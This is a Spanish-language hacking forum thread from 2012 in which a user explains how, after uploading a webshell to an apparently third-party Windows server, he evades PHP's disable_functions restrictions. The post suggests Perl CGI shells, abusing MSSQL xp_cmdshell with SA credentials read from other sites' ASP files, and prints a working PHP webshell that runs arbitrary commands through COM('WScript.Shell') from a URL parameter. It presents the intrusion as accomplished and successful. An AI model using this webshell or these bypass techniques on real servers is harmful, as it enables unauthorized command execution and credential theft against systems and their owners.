comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Windows OS] Evadiendo las disable_functions en php con COM()

  • 1 Respuestas
  • 1586 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado q3rv0

  • *
  • Underc0der
  • Mensajes: 207
  • Actividad:
    1.67%
  • Reputación 1
  • %ERRORLEVEL%
    • Ver Perfil
    • q3rv0
    • Email
« en: Diciembre 27, 2012, 02:41:42 am »
Escribo este mini post, para hablar sobre el tema de evacion de ejecucion de comandos en servidores Windows, es que hace poquito subi una webshell a un Windows NT, y me encontre con las siguientes funciones denegadas:

system
shell
exec
system_exec
shell_exec
mysql_pconnect
passthru
popen
proc_open
proc_close
proc_nice
proc_terminate
proc_get_status
escapeshellarg
escapeshellcmd




Ademas recorde que el usuario Abnormality tenia el mismo problema asi que por que no aclararlas en este escrito, ademas de hablar un poco sobre las maneras que pueden haber para saltearnos esta restriccion que el administrador impuso dentro del php.ini, en mi caso me tope con un server que corre dos tecnologias web como lo son PHP y ASP, otras cosas a tener en cuenta pegandole una ojeada a la imagen son las siguientes:

-Base de datos MSSQL corriendo en local.

-Lenguaje Perl activo

-ASP


-De ahora en mas ya tenemos dos maneras posibles de ejecutar comnados en el servidor, una es utlizando alguna webshell en perl, como por ejemplo la tan conocida "CGI telnet", pero ademas de incluir un .htaccess que nos agregue la extencion .pl dentro del modulo del servidor, vamos a tener que modificar la ruta #!/usr/bin/perl por el path en el que se encuentra instalado perl, por defecto esta es #!C:\Program Files\perl\perl.exe pero podria estar instalado en otra hubicacion, para eso podriamos buscar la existencia de algun perlinfo.cgi el cual es un fichero que guarda informacion de perl similar a info.php, hay podriamos buscar el path del mismo.

- Otra manera seria ingresando a la base de datos MSSQL con privilegios de SA y ejecutar comandos mediante la funcion XP_CMDSHELL, esto lo podriamos hacer indagando en los scripts *.asp (formularios de autentificacion) de los demas dominios que conviven en el servidor, ya que no se me impedia moverme libremente por el mismo y leer ficheros dentro de lo que son los directorios web. Obviamente se debe a una mala configuracion de los permisos.

- Tambien podemos subir un shell en ASP.



Y por ultimo llegamos al uso de COM en php, 

Basicamente y sin dar muchas vueltas COM permite interactuar con las aplicaciones de windows,  fue desarrlollado para trabjar con POO (programacion orientada a objetos) y esta compuesto por objetos como WScript.Shell el cual permite interactuar con programas como el regedit, acceso a los directorios del sistema, entre otras tareas.

De esta manera investigando a pleno me encuentro con el siguiente script programado por hadi-kiamarsi en php:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
<?php

error_reporting
(E_ALL);

if (isset(
$_GET['hk']) and !empty($_GET['hk']))
{
    
$nuevo=new COM('WScript.Shell') or die('Unable to Load Activex'); //se crea el objeto WScript.Shell
    
$salida=$nuevo->exec($_GET['hk']); //variable de entrada para ejecucion de comandos a travez de WScript mediante exec()
    
echo "<pre>";
    echo 
$salida->stdout->readall// obtencion de datos mediante stdout->readall
    
echo "</pre>";
}
?>


El cual me premitio cumplir con mi objetivo en el servidor, lo comente un poco para que se entienda aunque es bastante sencillo e intuitivo.



Saludos y espero que hayan aprendido algo nuevo, por mi parte me alegro de cada dia aparezcan nuevos desafios para seguir dandole para adelante con el conocimiento y la curiosidad!
« Última modificación: Noviembre 23, 2014, 01:28:09 pm por Expermicid »
Web: No tienes permisos para ver links. Registrate o Entra con tu cuenta

Twitter: No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado WARsec

  • *
  • Underc0der
  • Mensajes: 88
  • Actividad:
    0%
  • Reputación 0
  • "tierra de libertad,casa de los valientes."
    • Ver Perfil
« Respuesta #1 en: Diciembre 27, 2012, 05:54:03 pm »
interensante! gracias!

 

¿Te gustó el post? COMPARTILO!



MS14-060 Microsoft Windows OLE Package Manager Code Execution Exploit

Iniciado por Stuxnet

Respuestas: 1
Vistas: 3276
Último mensaje Octubre 24, 2014, 09:18:14 pm
por zekurity
Nuevo Exploit 0day para Internet Explorer 7, 8, 9 en Windows XP, Vista y 7

Iniciado por CalebBucker

Respuestas: 1
Vistas: 2180
Último mensaje Septiembre 17, 2012, 04:49:25 pm
por Slore
Crackear password de administrador en windows usando Backtrack 3

Iniciado por dracko.rx

Respuestas: 0
Vistas: 2161
Último mensaje Febrero 25, 2010, 11:25:50 am
por dracko.rx
[video] Introducción al Exploiting en Windows x86 by UND3R (Corelan)

Iniciado por .:UND3R:.

Respuestas: 0
Vistas: 2017
Último mensaje Marzo 21, 2018, 12:40:31 pm
por .:UND3R:.
CVE-2015-1701 : Windows 7 privilege escalation vulnerability

Iniciado por LionSec

Respuestas: 8
Vistas: 4152
Último mensaje Mayo 22, 2015, 08:02:27 pm
por rand0m